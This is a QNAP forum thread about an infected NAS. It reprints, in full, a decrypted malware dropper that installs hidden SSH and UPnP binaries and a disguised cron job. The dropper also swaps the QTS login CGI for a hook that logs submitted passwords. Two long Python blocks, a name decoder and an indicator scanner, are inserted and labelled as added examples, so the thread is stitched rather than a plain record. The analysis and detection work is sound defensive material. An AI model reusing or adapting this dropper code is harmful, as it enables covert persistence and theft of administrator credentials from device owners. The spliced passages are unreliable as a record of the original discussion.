Strange folders and cronjobs

Questions about SNMP, Power, System, Logs, disk, & RAID.
dolbyman
Guru
Posts: 34903
Joined: Sat Feb 12, 2011 2:11 am
Location: Vancouver BC , Canada

Re: Strange folders and cronjobs

Post by dolbyman »

8TB external drives are cheap... should be plenty of space for movies
benzo83
Starting out
Posts: 28
Joined: Wed Nov 18, 2015 4:50 am

Re: Strange folders and cronjobs

Post by benzo83 »

dolbyman wrote:8TB external drives are cheap... should be plenty of space for movies
not too cheap, 300 euro :/
dolbyman
Guru
Posts: 34903
Joined: Sat Feb 12, 2011 2:11 am
Location: Vancouver BC , Canada

Re: Strange folders and cronjobs

Post by dolbyman »

Don
Guru
Posts: 12289
Joined: Thu Jan 03, 2008 4:56 am
Location: Long Island, New York

Re: Strange folders and cronjobs

Post by Don »

benzo83 wrote:Can I safely remove these files? Can any QNAP employee answer me?
No, QNAP employees cannot answer you. This is a community forum and not a QNAP support channel. If you want an answer from QNAP then you need to open a ticket.
Use the forum search feature before posting.

Use RAID and external backups. RAID will protect you from disk failure, keep your system running, and data accessible while the disk is replaced, and the RAID rebuilt. Backups will allow you to recover data that is lost or corrupted, or from system failure. One does not replace the other.

NAS: TVS-882BR | F/W: 5.0.1.2346 | 40GB | 2 x 1TB M.2 SATA RAID 1 (System/VMs) | 3 x 1TB M.2 NVMe QM2-4P-384A RAID 5 (cache) | 5 x 14TB Exos HDD RAID 6 (Data) | 1 x Blu-ray
NAS: TVS-h674 | F/W: 5.0.1.2376 | 16GB | 3 x 18TB RAID 5
Apps: DNSMasq, PLEX, iDrive, QVPN, QLMS, MP3fs, HBS3, Entware, DLstation, VS, +
Mousetick
Experience counts
Posts: 1081
Joined: Thu Aug 24, 2017 10:28 pm

Re: Strange folders and cronjobs

Post by Mousetick »

This is a nasty piece of sh.itware you've got there.

I decrypted the autorun.sh (see further below).

I can't spend the time to read and understand what all the script code does, I'm not paid for that, it's QNAP's job, and the tight code gives me a headache, but here is what I can make of it:
- It makes various configuration checks
- It creates a bunch of hidden directories in various places
- It unpacks a compressed tarball and installs its contents in the previous directories and other places
- It checks if the admin password is the default
- It installs a CGI script that intercepts the QTS login so it can steal the admin password if it's not the default
- It installs cron jobs
- It installs SSH and UPNP programs

So even if you change the admin password, chances are that you are still toast. Your best defense, short of reinitializing the NAS from scratch, is to disconnect the NAS from the network, not just from the Internet, but from your network altogether. Keep it air-gapped until you are certain that the NAS is clean, and you have educated yourself on proper security practices and how to protect your router, your network, your computer(s) and your NAS against nasties.

Decrypted autorun.sh:


#!/bin/sh
export PATH="${PATH}:/bin:/sbin:/usr/bin:/usr/sbin:/usr/bin/X11:/usr/local/sbin:/usr/local/bin"
command -v dirname >/dev/null 2>&1 || dirname () { test -z "$1" && echo "." && return; local r="${1%"${1##*[!/]}"}"; case $r in /*[!/]*/*|[!/]*/*) r="${r%/*}"; echo "${r%"${r##*[!/]}"}";; */*) echo ${r%%[!/]};; "") echo $1;; *) echo .;; esac; }
test -d /etc/config && confdir=/etc/config || { test -d /mnt/HDA_ROOT/.config && confdir=/mnt/HDA_ROOT/.config; }
command -v getcfg > /dev/null 2>&1 || getcfg () { sed -n 'H;${x;s/\(.*\
\['"${1//\//\\\/}"']\|^\['"${1//\//\\\/}"']\)\
//I;s/\(^\|\
\)\[[^\
]\+\]\
.*//p}' "${4:-${confdir}/uLinux.conf}" | sed -n 's/^'"${2//\//\\\/}"' \?= \?\(.*\)/\1/Ip'; }
bdir=
test -f "${confdir}/smb.conf" && for i in homes Public Download Multimedia Web Recordings; do bdir=`getcfg "$i" path -f "${confdir}/smb.conf"` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && test -d "$bdir" && testwriteable=$(mktemp "${bdir}/.tmp.XXXXXX") && rm "${testwriteable}" && break; bdir=''; done
test -z "${bdir}" || test ! -d "${bdir}" && { command -v readlink >/dev/null 2>&1 || ln -sf /bin/busybox /usr/bin/readlink; for i in homes Public Download Multimedia Web Recordings; do bdir=`readlink "/share/${i}" 2>/dev/null` && test ! -z "$bdir" && bdir=`dirname "$bdir"` && bdir=/share/${bdir##*/} && test -d "$bdir" && break; done;
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`getcfg SHARE_DEF defVolMP -f "${confdir}/def_share.info"`
test -z "${bdir}" || test ! -d "${bdir}"; } && { bdir=`mount | sed -n "s/.*\(\/share\/[^ /]\+\) .*/\1/gp" | head -n 1`
test -z "${bdir}" || test ! -d "${bdir}"; } && { for i in CACHEDEV3_DATA CACHEDEV2_DATA CACHEDEV1_DATA MD0_DATA; do test -d "/share/${i}" && bdir="/share/${i}" && break; done;
test -z "${bdir}" || test ! -d "${bdir}" && bdir=/mnt/HDA_ROOT; }
arch_o=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo x86 || echo arm`
upnpbin=$(echo IHu`echo -ne "\\x70\\x73\\x75\\x72"`iSU`echo -ne "\\x66\\x6d\\x6b\\x70"` | tr "SDkYwfvrzzYMiCUcEaImyEaP" "kthefyrfFVeCnDvXyqvfYPzR")
cgi=$(echo a`echo -ne "\\x6a\\x6d"`SVy`echo -ne "\\x62\\x74\\x64\\x76"`pE`echo -ne "\\x6c\\x78\\x65"` | tr "pRymvOeuSRSmMZEeGIMRB" "rj.QhzgEoEd.ALxVmEFsB")
sshbin=$(echo O`echo -ne "\\x72\\x70"`zsu`echo -ne "\\x79\\x63\\x68\\x63"` | tr "xjWHiEYgzocaEyKIBwFS" "MrTFiJGZEPhRIcZnfFhT")
sshhkey=$(echo RrP`echo -ne "\\x6c\\x72\\x76\\x71"`Lc`echo -ne "\\x66\\x6c\\x71"`Rv`echo -ne "\\x6d\\x6b\\x65"` | tr "sVqsTJsNcJPKuLoxugtmPSrv" "InRreWNeZt.pPZAtCdhhcamb")
sshauth=$(echo iN`echo -ne "\\x61\\x6a\\x66"`n`echo -ne "\\x62\\x71"`VCB`echo -ne "\\x70\\x7a\\x69\\x76"` | tr "hauNqrNprUetkKAdZLBafo" "MaPTVgjuDrn.wuzCzeLfox")
sshconf=$(echo QG`echo -ne "\\x6d\\x6c\\x75"`P`echo -ne "\\x76\\x73"` | tr "FixDfMglHsQQJEiRSPLdIxPj" "gCKpGjffRBUUpRSrgDLpAPrH")
archarm=$(echo oS`echo -ne "\\x75\\x6f\\x63"`Ie`echo -ne "\\x66\\x65\\x63"` | tr "gvDHDJFnerSYCWLeEqQXIHY" "lFVogPcyAiqRzTdpoCZBtXn")
archx86=$(echo B`echo -ne "\\x70\\x71"`Tx`echo -ne "\\x69\\x77\\x75"`fP`echo -ne "\\x67\\x79\\x69"` | tr "XlAsnKrbjXXpZbMdCfsrY" "xeNfamiqkSwmmJTyHkPcr")
ipath=$(echo KZ`echo -ne "\\x61\\x73\\x72"`mRQ`echo -ne "\\x69\\x65\\x6b\\x61"` | tr "dkdbaKGBeThGSsJcYKVLwz" ".VwDEtExkUllASJBIkSUnB")
crons=$(echo i`echo -ne "\\x69\\x76"`YzW`echo -ne "\\x73\\x73\\x69\\x72"` | tr "OwnRESmebMGYByfUjprk" "bYGVwvwuIKswzlOxluSY")
arch=`uname -m | grep -i "x86\|i[3-6]86" > /dev/null && echo "$archx86" || echo "$archarm"`
test -f "./${arch}" && sdir=`pwd` || { test "${BASH_SOURCE[0]}" && sdir=$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd ) || { test "${0}" && sdir=$( cd "$( dirname "${0}" )" && pwd ); } && test -f "${sdir}/${arch}" && cd "${sdir}"; } || { test -f "/tmp/config/${arch}" && cd /tmp/config; } || {
mdir=$(mktemp -d /tmp/.mount.XXXXXX) || { mdir=/tmp/.mount.jbbxQob; mkdir ${mdir}; }
__BOOT_DEV=
__model=`getcfg System "Internal Model"`
CONFIG_DEV_NODE=`getcfg "CONFIG STORAGE" DEVICE_NODE -f /etc/platform.conf`
CONFIG_DEV_PART=`getcfg "CONFIG STORAGE" FS_ACTIVE_PARTITION -f /etc/platform.conf`
CONFIG_DEV_FS=`getcfg "CONFIG STORAGE" FS_TYPE -f /etc/platform.conf`
__BOOT_CONF=`test -f /etc/default_config/BOOT.conf && cat /etc/default_config/BOOT.conf 2>/dev/null || cat "${confdir}/BOOT.conf"` || { test "$arch_o" = arm && __BOOT_CONF=TS-NASARM; } 
command -v hal_app > /dev/null 2>&1 && { __BOOT_DEV=$(hal_app --get_boot_pd port_id=0); }
test "${__BOOT_CONF}" = TS-NASARM || test "$arch_o" = arm && { test -f /etc/IS_TAS && __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}7" || __BOOT_DEV="${__BOOT_DEV:-/dev/mtdblock}5"; } || __BOOT_DEV="${__BOOT_DEV:-/dev/sdx}6"
test "x${CONFIG_DEV_NODE}" != "x" && { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}" > /dev/null 2>&1 || { test -f /etc/IS_TAS && mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } } || mount ${__BOOT_DEV} -t ext2 ${mdir} || { test "${__model}" = "TS-201" && mount -t ext2 /dev/mtdblock4 ${mdir}; } || { ubiattach -m "${CONFIG_DEV_PART}" -d 2; mount -t ubifs ubi2:config "${mdir}"; mount -t ext4 /dev/mmcblk0p7 "${mdir}"; } || { test "${__model}" = "TS-269L" && mount -t ext2 /dev/sdc6 ${mdir}; } || { test "${__model}" = "TS-869" && mount -t ext2 /dev/sdi6 ${mdir}; } || { test "$arch_o" = arm || ${__BOOT_CONF} = "TS-NASARM" && { for i in 5 7 4 6 3 8; do mount -t ext2 "/dev/mtdblock${i}" ${mdir} && break; done; }; } || { test "$arch_o" = x86 && for n in /dev/sdc /dev/sdx /dev/sdi $__BOOT_DEV; do for i in 6 $CONFIG_DEV_PART; do mount -t ext2 ${n}${i} ${mdir} && break 2; done; done; } || { mount -t ext2 $(/sbin/hal_app --get_boot_pd port_id=0)6 ${mdir}; }; }
for file in "${sshbin}" "${upnpbin}" "."; do test -f "${bdir}/.${ipath}/${file}" || break; done
test "$file" != "." || test ! -f "${bdir}/.${ipath}/${crons}.sh" && { test -s .BOOT_TIME && read -r boottime < .BOOT_TIME || echo `date +%s` > .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME" || echo `date +%s` > "${bdir}/.BOOT_TIME"; test "$boottime" || { read -r boottime < .BOOT_TIME; test -s "${bdir}/.BOOT_TIME" && read -r boottime < "${bdir}/.BOOT_TIME"; }; test "$boottime" && { sleep 2; [ $boottime -gt 0 ] && e=$(( `date +%s` - $boottime )) && [ $e -gt 0 ] && [ $e -lt 1296000 ] && { test "$mdir" && test -e "${mdir}" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & }; noex=1; }; }; }
test "$noex" = 1 || {
rm "${bdir}/.BOOT_TIME"
rm .BOOT_TIME
test ! -f "./${arch}" && test -d "${mdir}" && test -f "${mdir}/${arch}" && cd "${mdir}"
tdir=`mktemp -d "${bdir}/.temp.XXXXXX" || mktemp -d "/share/Public/.temp.XXXXXX" || mktemp -d "/mnt/HDA_ROOT/.temp.XXXXXX"`
test -d "$tdir" || { for i in "$bdir" "/share/Public" "/mnt/HDA_ROOT"; do mkdir "${i}/.temp.jbbxQob" > /dev/null 2>&1 && test -d "${i}/.temp.jbbxQob" && tdir="${i}/.temp.jbbxQob"; done;
test -d "$tdir"; } || { tdir=`mktemp -d /tmp/.temp.XXXXXX` && test -d "$tdir"; } || { mkdir "/tmp/.temp.jbbxQob" && tdir=/tmp/.temp.jbbxQob && test -d "$tdir"; } || { tdir=`mktemp -d .XXXXXX` && test -d "$tdir"; } || { mkdir ".jbbxQob" && tdir=".jbbxQob" && test -d "$tdir"; } || tdir=`pwd`
cp "${arch}" ${tdir}
cd ${tdir}
tar -xzf "${arch}"
grep -F '' <<EOF >/dev/null 2>&1 && fgrep="grep -F" || { command -v fgrep >/dev/null 2>&1 && fgrep=fgrep || fgrep=grep; }

EOF
test "$fgrep" || fgrep=grep

test -d "${bdir}/.${ipath}" || mkdir -p "${bdir}/.${ipath}" || mkdir "${bdir}/.${ipath}"

test -f "$cgi" && chmod 755 "$cgi" && "./${cgi}"

test -f /tmp/qpkg.conf.bak && { touch -cr /tmp/qpkg.conf.bak "${confdir}/qpkg.conf"; rm /tmp/qpkg.conf.bak; }

cp -p ${crons} "${bdir}/.${ipath}/${crons}.sh" || { cp ${crons} "${bdir}/.${ipath}/${crons}.sh"; touch -cr /bin/busybox "${bdir}/.${ipath}/${crons}.sh"; }

chmod 755 "${bdir}/.${ipath}/${crons}.sh"

if [ -f "${confdir}/crontab" ]; then
test "$RANDOM" || RANDOM=12499
test $(( $RANDOM & 1 )) = 0 && space=' ' || space=''
cronmins="$(( $RANDOM % 4 ))"
test ! "$cronmins" -eq 0 && cronmins="${cronmins}0" 
$fgrep "${bdir}/.${ipath}/${crons}.sh" "${confdir}/crontab" >/dev/null 2>&1 || { l=$(( (`wc -l < "${confdir}/crontab"` / 3) + 1)); test "$l" -gt 0 && sed -i "${l}"'i'"$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1' "${confdir}/crontab" || echo "$cronmins"' * * * * '"${bdir}/.${ipath}/${crons}.sh"' >'"$space"'/dev/null 2>&1"' >> "${confdir}/crontab" && /etc/init.d/crond.sh restart > /dev/null 2>&1 && touch -cr ${confdir}/apache ${confdir}/crontab; }
fi

for file in "${sshbin}" "${upnpbin}"; do test -f "${bdir}/.${ipath}/${file}" || cp -p "${file}" "${bdir}/.${ipath}/${file}" || { cp "${file}" "${bdir}/.${ipath}/${file}"; touch -cr /bin/busybox "${bdir}/.${ipath}/${file}"; } done
chmod 755 "${bdir}/.${ipath}/${sshbin}"
chmod 755 "${bdir}/.${ipath}/${upnpbin}"

grep 'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:' /etc/shadow >/dev/null 2>&1 && {
! test -d "${bdir}/.log" && mkdir "${bdir}/.log"
! test -f /home/httpd/cgi-bin/QTSauthLogin.cgi && { cp -p /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi || cp /home/httpd/cgi-bin/authLogin.cgi /home/httpd/cgi-bin/QTSauthLogin.cgi; } && echo '#!/bin/sh
POSTDATA=""
test "x${REQUEST_METHOD}" = xPOST && { 
case "${CONTENT_LENGTH}" in '"''"' | *[!0-9]* | 0* ) false ;; *) test "${CONTENT_LENGTH}" -lt 2147483646 ;; esac && { IFS= read -d '"''"' -rn "${CONTENT_LENGTH}" POSTDATA; test -z "$POSTDATA" && POSTDATA=`dd bs=1 count="$CONTENT_LENGTH" 2>/dev/null`; } || test "$POSTDATA" || POSTDATA=`cat` 

test ! -z "$POSTDATA" && case "${POSTDATA}" in *pwd*) test -f "'${bdir}'/.log/.cgi_log" || { test -d "'${bdir}'/.log" || mkdir -p "'${bdir}'/.log" && touch "'${bdir}'/.log/.cgi_log"; } && test $((`stat -c '"'"'%s'"'"' "'${bdir}'/.log/.cgi_log"`)) -lt 209715200 && cat >> "'${bdir}'/.log/.cgi_log" << EOF ;; esac;
$REMOTE_ADDR:$POSTDATA
EOF
}
test ! -z "$POSTDATA" && case "$POSTDATA" in *user=admin* ) true ;; *) false ;; esac || case "$QUERY_STRING" in *user=admin*) true ;; *) false ;; esac && {
case "${REMOTE_ADDR}" in '"''"' | 10.* | 127.* | 192.168.* | 169.254.* | 172.1[6-9].* | 172.2[0-9].* | 172.3[01].* | *:* ) false ;; *) true ;; esac && grep '"'"'admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:'"'"' /etc/shadow >/dev/null 2>/dev/null && exit 0
}
if ! test -z "$POSTDATA"; then 
exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi << V4KLDmYwvc
$POSTDATA
V4KLDmYwvc
else
exec -a "${0}" /home/httpd/cgi-bin/QTSauthLogin.cgi
fi
exit 0' > /home/httpd/cgi-bin/_authLogin.cgi
test "$?" = 0 && test -s /home/httpd/cgi-bin/_authLogin.cgi && test -s /home/httpd/cgi-bin/QTSauthLogin.cgi && mv /home/httpd/cgi-bin/_authLogin.cgi /home/httpd/cgi-bin/authLogin.cgi && chmod 755 /home/httpd/cgi-bin/authLogin.cgi && touch -cr /home/httpd/cgi-bin/QTSauthLogin.cgi /home/httpd/cgi-bin/authLogin.cgi
}

. "${bdir}/.${ipath}/${crons}.sh"
cd "${sdir}"
rm -rf "${tdir}"
test "$mdir" && test -d "$mdir" && { cd /; sh -c "sleep 5; umount ${mdir}; rmdir ${mdir}" & } 
true;
}


#]
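None of the file or directory names in the script above appear in clear text: each one is an `echo` of literal fragments and `echo -ne` hex escapes, piped through `tr` with a throwaway substitution alphabet, so the names only exist at run time. The Python below is an added example, not code from the thread or from QNAP. It parses those ten assignment lines exactly as pasted above and recovers the names without executing any part of the dropper, which is safer than pasting the lines into a local shell whose `echo` may not implement `-e` or `\x` escapes the way busybox does. It models `tr` on the assumption that a character repeated in SET1 keeps its last pairing, as GNU coreutils and busybox `tr` do; `install_paths` and the `/share/CACHEDEV1_DATA` volume root are illustrative assumptions (the script itself takes the first writable volume it finds).

```python
"""Recover the obfuscated names in the decrypted autorun.sh above.

Added example, not code from the thread or from QNAP. Every name in the
dropper is built at run time as

    echo <literal>`echo -ne "\\x.."`<literal>... | tr SET1 SET2

This re-implements the two steps (hex-escape expansion, then tr's
per-character substitution) so the names can be read off offline.
"""
import re

# Assignment lines copied verbatim from the decrypted script above.
OBFUSCATED_LINES = r'''
upnpbin=$(echo IHu`echo -ne "\\x70\\x73\\x75\\x72"`iSU`echo -ne "\\x66\\x6d\\x6b\\x70"` | tr "SDkYwfvrzzYMiCUcEaImyEaP" "kthefyrfFVeCnDvXyqvfYPzR")
cgi=$(echo a`echo -ne "\\x6a\\x6d"`SVy`echo -ne "\\x62\\x74\\x64\\x76"`pE`echo -ne "\\x6c\\x78\\x65"` | tr "pRymvOeuSRSmMZEeGIMRB" "rj.QhzgEoEd.ALxVmEFsB")
sshbin=$(echo O`echo -ne "\\x72\\x70"`zsu`echo -ne "\\x79\\x63\\x68\\x63"` | tr "xjWHiEYgzocaEyKIBwFS" "MrTFiJGZEPhRIcZnfFhT")
sshhkey=$(echo RrP`echo -ne "\\x6c\\x72\\x76\\x71"`Lc`echo -ne "\\x66\\x6c\\x71"`Rv`echo -ne "\\x6d\\x6b\\x65"` | tr "sVqsTJsNcJPKuLoxugtmPSrv" "InRreWNeZt.pPZAtCdhhcamb")
sshauth=$(echo iN`echo -ne "\\x61\\x6a\\x66"`n`echo -ne "\\x62\\x71"`VCB`echo -ne "\\x70\\x7a\\x69\\x76"` | tr "hauNqrNprUetkKAdZLBafo" "MaPTVgjuDrn.wuzCzeLfox")
sshconf=$(echo QG`echo -ne "\\x6d\\x6c\\x75"`P`echo -ne "\\x76\\x73"` | tr "FixDfMglHsQQJEiRSPLdIxPj" "gCKpGjffRBUUpRSrgDLpAPrH")
archarm=$(echo oS`echo -ne "\\x75\\x6f\\x63"`Ie`echo -ne "\\x66\\x65\\x63"` | tr "gvDHDJFnerSYCWLeEqQXIHY" "lFVogPcyAiqRzTdpoCZBtXn")
archx86=$(echo B`echo -ne "\\x70\\x71"`Tx`echo -ne "\\x69\\x77\\x75"`fP`echo -ne "\\x67\\x79\\x69"` | tr "XlAsnKrbjXXpZbMdCfsrY" "xeNfamiqkSwmmJTyHkPcr")
ipath=$(echo KZ`echo -ne "\\x61\\x73\\x72"`mRQ`echo -ne "\\x69\\x65\\x6b\\x61"` | tr "dkdbaKGBeThGSsJcYKVLwz" ".VwDEtExkUllASJBIkSUnB")
crons=$(echo i`echo -ne "\\x69\\x76"`YzW`echo -ne "\\x73\\x73\\x69\\x72"` | tr "OwnRESmebMGYByfUjprk" "bYGVwvwuIKswzlOxluSY")
'''

# name=$(echo <arg> | tr "SET1" "SET2")
ASSIGN_RE = re.compile(r'^(\w+)=\$\(echo (.+?) \| tr "([^"]*)" "([^"]*)"\)\s*$')
# one backticked `echo -ne "..."` segment inside <arg>
SEGMENT_RE = re.compile(r'`echo -ne "([^"]*)"`')
# \x.. escapes; tolerant of one or two backslashes in front of the x
HEX_RE = re.compile(r'x([0-9a-fA-F]{2})')


def expand_echo_arg(arg: str) -> str:
    """Concatenate the literal fragments with the decoded hex segments."""
    out = []
    for i, piece in enumerate(SEGMENT_RE.split(arg)):
        if i % 2:  # odd indices are the captured escape strings
            out.append(bytes.fromhex("".join(HEX_RE.findall(piece))).decode("ascii"))
        else:
            out.append(piece)
    return "".join(out)


def tr_translate(text: str, set1: str, set2: str) -> str:
    """Model `tr SET1 SET2`: a shorter SET2 is padded with its last character,
    and a character repeated in SET1 keeps its *last* pairing (assumption:
    that is what GNU coreutils and busybox tr do)."""
    if not set2:
        raise ValueError("tr: SET2 must not be empty")
    if len(set2) < len(set1):
        set2 += set2[-1] * (len(set1) - len(set2))
    table = {}
    for src, dst in zip(set1, set2):
        table[src] = dst  # later pairs overwrite earlier ones
    return "".join(table.get(ch, ch) for ch in text)


def decode_names(script_text: str) -> dict:
    """Map every obfuscated variable in the script text to its clear-text value."""
    names = {}
    for line in script_text.splitlines():
        m = ASSIGN_RE.match(line.strip())
        if m:
            var, arg, set1, set2 = m.groups()
            names[var] = tr_translate(expand_echo_arg(arg), set1, set2)
    return names


def install_paths(names: dict, bdir: str = "/share/CACHEDEV1_DATA") -> dict:
    """Where the dropper puts things, per its own cp/chmod lines. bdir is the first
    writable volume root it finds; /share/CACHEDEV1_DATA is an assumed example."""
    hidden = f"{bdir}/.{names['ipath']}"
    return {
        "hidden_dir": hidden,
        "cron_script": f"{hidden}/{names['crons']}.sh",
        "ssh_binary": f"{hidden}/{names['sshbin']}",
        "upnp_binary": f"{hidden}/{names['upnpbin']}",
        "credential_log": f"{bdir}/.log/.cgi_log",
    }


if __name__ == "__main__":
    decoded = decode_names(OBFUSCATED_LINES)
    for var, value in decoded.items():
        print(f"{var:8} = {value}")
    for what, path in install_paths(decoded).items():
        print(f"{what:15} {path}")
```

Run stand-alone it prints all ten names and the resulting drop locations. The cron script name, for instance, decodes to `iivwzWssiS` (so the hourly job is `<volume>/.<ipath>/iivwzWssiS.sh`), and the UPnP binary to `vHupsufnkvyfhp`; these are the "strange folders and cronjobs" of the thread title, and because the dropper copies timestamps from busybox and from `apache` onto everything it writes, the names are what you search for rather than modification times.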
benzo83
Starting out
Posts: 28
Joined: Wed Nov 18, 2015 4:50 am

Re: Strange folders and cronjobs

Post by benzo83 »

Mousetick wrote:This is a nasty piece of sh.itware you've got there.

I decrypted the autorun.sh (see further below).

I can't spend the time to read and understand what all the script code does, I'm not paid for that, it's QNAP's job, and the tight code gives me a headache, but here is what I can make of it:
- It makes various configuration checks
- It creates a bunch of hidden directories in various places
- It unpacks a compressed tarball and installs its contents in the previous directories and other places
- It checks if the admin password is the default
- It installs a CGI script that intercepts the QTS login so it can steal the admin password if it's not the default
- It installs cron jobs
- It installs SSH and UPNP programs

So even if you change the admin password, chances are that you are still toast. Your best defense, short of reinitializing the NAS from scratch, is to disconnect the NAS from the network, not just from the Internet, but from your network altogether. Keep it air-gapped until you are certain that the NAS is clean, and you have educated yourself on proper security practices and how to protect your router, your network, your computer(s) and your NAS against nasties.

Thank you.
The router is an ISP router, the NAS is a QNAP NAS, all software is up to date, and the malware vehicle is one of the NAS services. I exposed the NAS to the network with 2FA, a strong password, etc., but it was not enough.
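A NAS that, like benzo83's above, was exposed with 2FA and a strong password still needs to be checked for the specific things the decrypted dropper does, which Mousetick summarised in the earlier post. The Python below is an added example, not code from the thread or from QNAP. It walks a filesystem root (a mounted image of the NAS rootfs and volumes, or `/` on the box itself if a Python package is installed there) and reports the artefacts the script's own source says it leaves behind: the original login CGI renamed to `QTSauthLogin.cgi` and replaced by a shell script, an hourly cron line pointing into a hidden directory under a volume root, the `.log/.cgi_log` credential log, the `.BOOT_TIME` throttle marker, leftover `.mount.*`/`.temp.*` directories, and the exact admin hash the dropper greps for in `/etc/shadow` before it installs the hook. The hidden-directory heuristic and the sample tree built by `demo()` are mine; every path and name in that tree is constructed for the example.

```python
"""Check a QNAP filesystem for the artefacts the decrypted autorun.sh leaves behind.

Added example, not code from the thread or from QNAP. Each check maps to a
line of the dropper's own source; the demo() tree is constructed data.
"""
import re
import stat
import tempfile
from pathlib import Path

# Volume roots the dropper falls back to when smb.conf cannot be read (from its code).
SHARE_ROOTS = ("share/CACHEDEV1_DATA", "share/CACHEDEV2_DATA",
               "share/CACHEDEV3_DATA", "share/MD0_DATA", "mnt/HDA_ROOT")

# The crontab line it writes: "<MM> * * * * <bdir>/.<hidden>/<name>.sh >/dev/null 2>&1"
# with MM in {0,10,20,30} and an optional space after ">" picked at random.
# Legitimate QPKG jobs live deeper (.qpkg/<pkg>/...) and do not match.
CRON_RE = re.compile(
    r"^\s*\d{1,2}\s+\*\s+\*\s+\*\s+\*\s+(\S+/\.[^/\s]+/[^/\s]+\.sh)\s+>\s?/dev/null 2>&1\s*$")

# The /etc/shadow entry the dropper tests before hooking authLogin.cgi.
SHADOW_RE = re.compile(r"^admin:\$1\$\$CoERg7ynjYLsj2j4glJ34\.:")


def is_script(path: Path) -> bool:
    """True when the file starts with '#!'; the genuine authLogin.cgi is a compiled binary."""
    try:
        with path.open("rb") as fh:
            return fh.read(2) == b"#!"
    except OSError:
        return False


def executables(d: Path):
    """Regular files with the owner-execute bit set, directly inside d."""
    try:
        return [f for f in d.iterdir() if f.is_file() and f.stat().st_mode & stat.S_IXUSR]
    except OSError:
        return []


def scan(root="/"):
    """Return human-readable findings; an empty list means none of the indicators are present."""
    root = Path(root)
    hits = []
    cgi = root / "home/httpd/cgi-bin"
    if (cgi / "QTSauthLogin.cgi").exists():
        hits.append(f"{cgi}/QTSauthLogin.cgi exists: the original login CGI was renamed")
    if is_script(cgi / "authLogin.cgi"):
        hits.append(f"{cgi}/authLogin.cgi is a shell script, not the QTS binary")
    crontab = root / "etc/config/crontab"
    if crontab.is_file():
        for n, line in enumerate(crontab.read_text(errors="replace").splitlines(), 1):
            m = CRON_RE.match(line)
            if m:
                hits.append(f"{crontab}:{n}: hourly job in a hidden directory: {m.group(1)}")
    shadow = root / "etc/shadow"
    if shadow.is_file() and any(SHADOW_RE.match(ln)
                                for ln in shadow.read_text(errors="replace").splitlines()):
        hits.append(f"{shadow}: admin entry matches the hash the dropper tests for")
    for rel in SHARE_ROOTS:
        share = root / rel
        if not share.is_dir():
            continue
        if (share / ".log" / ".cgi_log").is_file():
            hits.append(f"{share}/.log/.cgi_log: captured login POST data (REMOTE_ADDR:body)")
        if (share / ".BOOT_TIME").is_file():
            hits.append(f"{share}/.BOOT_TIME: reinstall-throttle marker")
        for d in share.iterdir():
            if d.name.startswith(".temp."):
                hits.append(f"{d}: leftover unpack directory")
            elif d.name.startswith(".") and d.is_dir():
                ex = executables(d)  # heuristic: small hidden dir holding a .sh plus binaries
                if len(ex) >= 3 and any(f.suffix == ".sh" for f in ex):
                    hits.append(f"{d}: hidden directory with {len(ex)} executables and a .sh (review)")
    tmp = root / "tmp"
    if tmp.is_dir():
        for d in tmp.glob(".mount.*"):
            hits.append(f"{d}: leftover config-partition mount point")
    return hits


def demo():
    """Scan an empty tree, then plant every indicator (constructed data) and scan again."""
    with tempfile.TemporaryDirectory() as base:
        root = Path(base)
        clean = scan(root)
        cgi = root / "home/httpd/cgi-bin"
        cgi.mkdir(parents=True)
        (cgi / "QTSauthLogin.cgi").write_bytes(b"\x7fELF")  # stands in for the real binary
        (cgi / "authLogin.cgi").write_text('#!/bin/sh\nexec -a "$0" /home/httpd/cgi-bin/QTSauthLogin.cgi\n')
        (root / "etc/config").mkdir(parents=True)
        (root / "etc/config/crontab").write_text(
            "0 3 * * * /etc/init.d/example_backup.sh\n"
            "30 * * * * /share/CACHEDEV1_DATA/.hidden_example/job.sh > /dev/null 2>&1\n")
        (root / "etc/shadow").write_text("admin:$1$$CoERg7ynjYLsj2j4glJ34.:0:0:99999:7:::\n")
        share = root / "share/CACHEDEV1_DATA"
        (share / ".log").mkdir(parents=True)
        (share / ".log/.cgi_log").write_text("203.0.113.5:user=admin&pwd=REDACTED\n")
        (share / ".BOOT_TIME").write_text("1700000000\n")
        hidden = share / ".hidden_example"
        hidden.mkdir()
        for name in ("job.sh", "sshd_example", "upnp_example"):
            p = hidden / name
            p.write_text("#!/bin/sh\n")
            p.chmod(0o755)
        (root / "tmp/.mount.example").mkdir(parents=True)
        return clean, scan(root)


if __name__ == "__main__":
    import sys
    findings = scan(sys.argv[1]) if len(sys.argv) > 1 else demo()[1]
    for finding in findings:
        print(finding)
```

Two design points follow from the script. First, the hook is installed while the admin entry still matches that hash, and from then on appends every POST containing `pwd` to `.cgi_log` and, while the hash still matches, silently drops admin logins arriving from non-private addresses; that is why the scanner reports the shadow match as a finding in its own right. Second, the dropper copies timestamps from `busybox`, from `apache` and from the original CGI onto everything it writes, so the checks key on names, content and placement rather than on modification times.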
somy1982
Easy as a breeze
Posts: 372
Joined: Fri Apr 08, 2016 6:42 pm

Re: Strange folders and cronjobs

Post by somy1982 »

benzo83 wrote:
dolbyman wrote:8TB external drives are cheap... should be plenty of space for movies
not too cheap, 300 euro :/
Do you have Music Station installed and enabled?
QNAP support suspects it is caused by a vulnerability in Music Station and suggested turning it off for now.
somy1982
Easy as a breeze
Posts: 372
Joined: Fri Apr 08, 2016 6:42 pm

Re: Strange folders and cronjobs

Post by somy1982 »

Mousetick wrote:This is a nasty piece of sh.itware you've got there.

I decrypted the autorun.sh (see further below).

I can't spend the time to read and understand what all the script code does, I'm not paid for that, it's QNAP's job, and the tight code gives me a headache, but here is what I can make of it:
- It makes various configuration checks
